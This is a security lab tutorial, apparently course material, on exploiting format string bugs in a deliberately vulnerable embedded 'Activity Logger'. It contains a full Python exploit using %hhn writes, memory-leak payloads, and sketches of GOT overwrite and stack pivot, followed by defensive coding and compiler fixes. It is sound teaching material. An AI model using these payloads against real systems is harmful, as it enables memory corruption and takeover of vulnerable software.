Skip to content

Lab 02: Format String Vulnerability

Introduction

Format string vulnerabilities represent a unique class of memory corruption bugs that shocked the security community when discovered in 2000. Unlike buffer overflows that require sequential memory corruption, format strings provide surgical precision for reading and writing arbitrary memory.

Difficulty: Medium
Category: Memory Corruption
Historical Context: WU-FTPD 2.6.0 (June 2000)

Learning Objectives

By completing this lab, you will:

  1. Understand how printf format strings work internally
  2. Master format string exploitation techniques
  3. Learn to read and write arbitrary memory
  4. Develop precision memory corruption skills
  5. Appreciate secure coding practices for output functions

Historical Background

The WU-FTPD Discovery (2000)

In June 2000, a researcher known as "tf8" posted about a critical vulnerability in WU-FTPD 2.6.0, one of the most popular FTP servers. The bug was deceptively simple:

// Vulnerable WU-FTPD code
sprintf(buf, user_controlled_string);

This discovery revealed an entire class of vulnerabilities hiding in plain sight. Within weeks, format string bugs were found in:

  • Linux rpc.statd (Ramen worm, 2001)
  • Various telnetd implementations
  • Logging daemons across platforms
  • Embedded device interfaces

Why Format Strings Shocked Security Researchers

  1. Ubiquitous: Printf-family functions everywhere
  2. Powerful: Read/write memory without overflow
  3. Subtle: Easy to introduce, hard to spot
  4. Precise: Byte-level memory manipulation

Vulnerability Overview

How Printf Works

Printf processes format specifiers to display variables:

int value = 42;
printf("Value: %d at %p\n", value, &value);

Format specifiers tell printf how to interpret arguments:

  • %d - Integer from next argument
  • %x - Hexadecimal from next argument
  • %s - String from pointer in next argument
  • %n - Write bytes printed to address in next argument

The Vulnerability

When user controls the format string:

void log_activity(char *user_input) {
    printf(user_input);  // VULNERABLE!
}

They control how printf interprets the stack:

  • %x - Read stack values
  • %s - Read from arbitrary addresses
  • %n - Write to arbitrary addresses

Lab Setup

Prerequisites

  • Completed Lab 01 (Buffer Overflow)
  • Understanding of printf internals
  • Python 3 with pwntools recommended

Getting Started

  1. Build and flash the vulnerable binary:

    cd /labs/02-format-string
    make
    make flash
    

  2. Connect to the target:

    screen /dev/ttyACM0 115200
    

  3. Explore the application:

    =================================
        Activity Logger v2.1
        Enhanced Security Edition
    =================================
    
    1. Log activity
    2. Check authentication
    3. Show hints
    4. Reset
    

Understanding the Target

Application Overview

The system is an "activity logger" with:

  • Logging Function: Vulnerable printf call
  • Authentication Check: Requires specific value in memory
  • Debug Hints: Shows important addresses
  • Stack Canary: Monitors for corruption

The Vulnerable Code

void log_activity(char *user_input)
{
    embsec_printf("Activity logged: ");
    embsec_printf(user_input);  // FORMAT STRING BUG!
    embsec_printf("\n");
}

The Goal

Set the authenticated variable to 0x41414141 to get the flag.

Vulnerability Analysis

Step 1: Confirm the Vulnerability

Test with format specifiers:

Enter activity to log: %x %x %x %x
Activity logged: 20000800 deadbeef 64 20000810

Success! We're reading stack values.

Step 2: Information Gathering

Use option 3 for hints:

=== System Information ===
Stack canary: 0xDEADBEEF (watching for corruption)
Auth variable: 0x20000C00 (current value: 0x00000000)
Auth success value: 0x41414141

Critical information:

  • Target address: 0x20000C00
  • Required value: 0x41414141
  • Stack canary present (but irrelevant for format strings)

Step 3: Find Input Position

Locate our input on the stack:

Enter activity to log: AAAA %x %x %x %x %x %x
Activity logged: AAAA 20000800 deadbeef 64 20000810 0 41414141

Our input "AAAA" (0x41414141) is at position 6!

Step 4: Direct Parameter Access

Verify using direct parameter access:

Enter activity to log: AAAA%6$x
Activity logged: AAAA41414141

Perfect! We can reference our input directly.

Format String Techniques

1. Memory Reading

Reading Stack Values:

%x %x %x %x        # Read 4 stack values
%6$x               # Read 6th parameter directly
%100x              # Read with width (padding)

Reading Arbitrary Memory:

# Place address on stack, use %s to dereference
addr = 0x20000100
payload = struct.pack('<I', addr)
payload += b'%6$s'  # Read string from addr

2. Memory Writing

The %n Specifier:

  • Writes number of bytes printed so far
  • Takes address from stack parameter
  • Variants: %n (4 bytes), %hn (2 bytes), %hhn (1 byte)

Basic Write:

# Write value 100 to address
payload = struct.pack('<I', target_addr)
payload += b'%96x'   # Print 96 more chars (total 100)
payload += b'%6$n'   # Write 100 to target_addr

3. Precision Writing

For exact values, use width specifiers:

# Write 0x41 to single byte
payload = struct.pack('<I', target)
# Already printed 4 bytes (address)
payload += b'%61c'   # Print 61 chars (total 65 = 0x41)
payload += b'%6$hhn' # Write single byte

Exploitation

Understanding the Target Value

We need to write 0x41414141:

  • 4 bytes, each containing 0x41
  • Decimal value: 65 ('A' in ASCII)

Exploitation Strategy

Write each byte separately using %hhn:

  1. Place 4 addresses on stack (target+0, +1, +2, +3)
  2. Use width specifiers to control bytes printed
  3. Write 0x41 to each address sequentially

Building the Exploit

#!/usr/bin/env python3
import struct
import serial
import time

# Target configuration
target_addr = 0x20000C00
target_value = 0x41414141

# Serial setup
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=1)

def send_command(cmd):
    ser.write(cmd.encode() + b'\n')
    time.sleep(0.1)

# Navigate to log activity
send_command('1')

# Build format string payload
payload = b''

# Place 4 addresses on stack
for i in range(4):
    payload += struct.pack('<I', target_addr + i)

# We've printed 16 bytes (4 addresses * 4 bytes each)
# Need to print 65 total for 0x41

# First byte: need 65 - 16 = 49 more
payload += b'%49c%6$hhn'

# Subsequent bytes: already at 65, just write
payload += b'%7$hhn'
payload += b'%8$hhn'
payload += b'%9$hhn'

# Send exploit
ser.write(payload + b'\n')

# Check authentication
time.sleep(0.5)
send_command('2')

# Read flag
response = ser.read(2000)
print(response.decode('latin-1'))

Manual Exploitation Steps

  1. Calculate addresses:

    for i in range(4):
        print(f"Address {i}: 0x{0x20000C00 + i:08x}")
    

  2. Build payload:

    import struct
    p = b''
    p += struct.pack('<I', 0x20000C00)
    p += struct.pack('<I', 0x20000C01)
    p += struct.pack('<I', 0x20000C02)
    p += struct.pack('<I', 0x20000C03)
    p += b'%49c%6$hhn%7$hhn%8$hhn%9$hhn'
    print(repr(p))
    

  3. Execute:

  4. Select option 1
  5. Paste payload
  6. Select option 2
  7. Get flag!

Expected Result

Choice: 2
ACCESS GRANTED!
Flag: embsec{f0rm4t_str1ng_wr1t3_4cc3ss}
Critical system compromise detected!

Advanced Techniques

1. Large Value Writes

Writing large values efficiently:

# Write 0xdeadbeef
# Split into: 0xde, 0xad, 0xbe, 0xef
# Order by value: 0xad, 0xbe, 0xde, 0xef

values = [(0xad, 1), (0xbe, 2), (0xde, 0), (0xef, 3)]
values.sort()

payload = b''
# Place addresses
for _, offset in values:
    payload += struct.pack('<I', target + offset)

printed = 16
for value, offset in values:
    needed = value - printed
    if needed > 0:
        payload += f'%{needed}c'.encode()
    payload += f'%{6+offset}$hhn'.encode()
    printed = value

2. GOT Overwrite

Overwrite Global Offset Table entries:

# Find GOT entry
got_printf = 0x20001234

# Overwrite with shellcode address
shellcode_addr = 0x20000500

# Use format string to overwrite GOT

3. Stack Pivot

Use format string to modify stack pointer:

# Write to saved stack pointer
# Pivot to controlled memory
# Execute ROP chain

4. Information Disclosure

Leak critical addresses:

# Leak stack canary
payload = b'%39$x'  # Canary often at fixed offset

# Leak return addresses
payload = b'%40$x'  # Find saved EIP/LR

# Leak library addresses (bypass ASLR)
payload = struct.pack('<I', got_entry)
payload += b'%6$s'  # Dereference GOT

Defensive Measures

Immediate Fixes

  1. Never Use User Input as Format String:

    // Vulnerable
    printf(user_input);
    snprintf(buf, size, user_input);
    syslog(LOG_INFO, user_input);
    
    // Secure
    printf("%s", user_input);
    snprintf(buf, size, "%s", user_input);
    syslog(LOG_INFO, "%s", user_input);
    

  2. Use Format String Literals:

    // Use string literals when possible
    #define LOG_FORMAT "[%s] User: %s, Action: %s\n"
    printf(LOG_FORMAT, timestamp, user, action);
    

Compiler Protections

Enable format string warnings:

CFLAGS += -Wformat=2
CFLAGS += -Wformat-security
CFLAGS += -Werror=format-security

Runtime Protections

  1. FORTIFY_SOURCE:

    CFLAGS += -D_FORTIFY_SOURCE=2
    

  2. Stack Canaries (limited effectiveness against format strings)

  3. RELRO (Relocation Read-Only):

    LDFLAGS += -Wl,-z,relro,-z,now
    

Common Pitfalls

1. Parameter Counting

Problem: Wrong position for direct parameter access
Solution: Test with AAAA and %x to find position

2. Alignment Issues

Problem: Addresses must be word-aligned on ARM
Solution: Ensure target addresses are 4-byte aligned

3. Width Calculation

Problem: Incorrect byte counts for %n
Solution: Track bytes printed carefully, including addresses

4. Format String Limits

Problem: Some implementations limit width specifiers
Solution: Use multiple writes or find alternatives

Real-World Impact

Format string bugs in the wild:

Historical Exploits

  • 2000: WU-FTPD 2.6.0 remote root
  • 2001: Linux rpc.statd (Ramen worm)
  • 2002: OpenBSD ftpd
  • 2003: Linux kernel vsprintf

Modern Occurrences

  • 2021: sudo format string in logging
  • 2020: Windows Print Spooler
  • IoT Devices: Common in embedded systems
  • Web Applications: Printf-style template engines

Comparison with Buffer Overflows

Aspect Buffer Overflow Format String
Discovery Obvious pattern Subtle mistake
Precision Sequential corruption Surgical writes
Read Capability Limited Extensive
Write Capability Sequential Arbitrary
Bypass Protections Harder Often easier
Complexity Lower Higher

Key Takeaways

  1. Format String Power: Read/write anywhere without overflow
  2. Always Use %s: Never pass user input as format string
  3. Compiler Warnings: Enable and heed format warnings
  4. Defense in Depth: Multiple protections needed
  5. Code Review: Look for printf-family vulnerabilities

Challenges

Challenge 1: Blind Exploitation

No debug output - can you still exploit?

  • Use %x to map memory
  • Find addresses through leaks
  • Brute force if necessary

Challenge 2: Limited Input Length

Only 32 bytes allowed:

  • Use short writes (%hn)
  • Multiple exploitation rounds
  • Leverage existing values

Challenge 3: ASLR Enabled

Randomized addresses:

  • Leak base addresses first
  • Use relative offsets
  • Partial overwrites

Further Reading

Technical Papers

Historical Documents

  • tf8's original WU-FTPD advisory
  • CERT Advisory CA-2000-13
  • Ramen worm analysis

Modern Research

  • Format string compiler defenses
  • Automated vulnerability detection
  • Format string fuzzing techniques

Next Steps

Congratulations on mastering format string exploitation! You've learned:

  • How printf processes format specifiers
  • Reading arbitrary memory with %x and %s
  • Writing arbitrary memory with %n
  • Precision memory corruption techniques
  • Why format string bugs are dangerous

Consider exploring:

  • Advanced ROP techniques
  • Heap exploitation methods
  • Integer overflow vulnerabilities
  • Race conditions in embedded systems

"With great power comes great responsibility" - Always use format strings safely!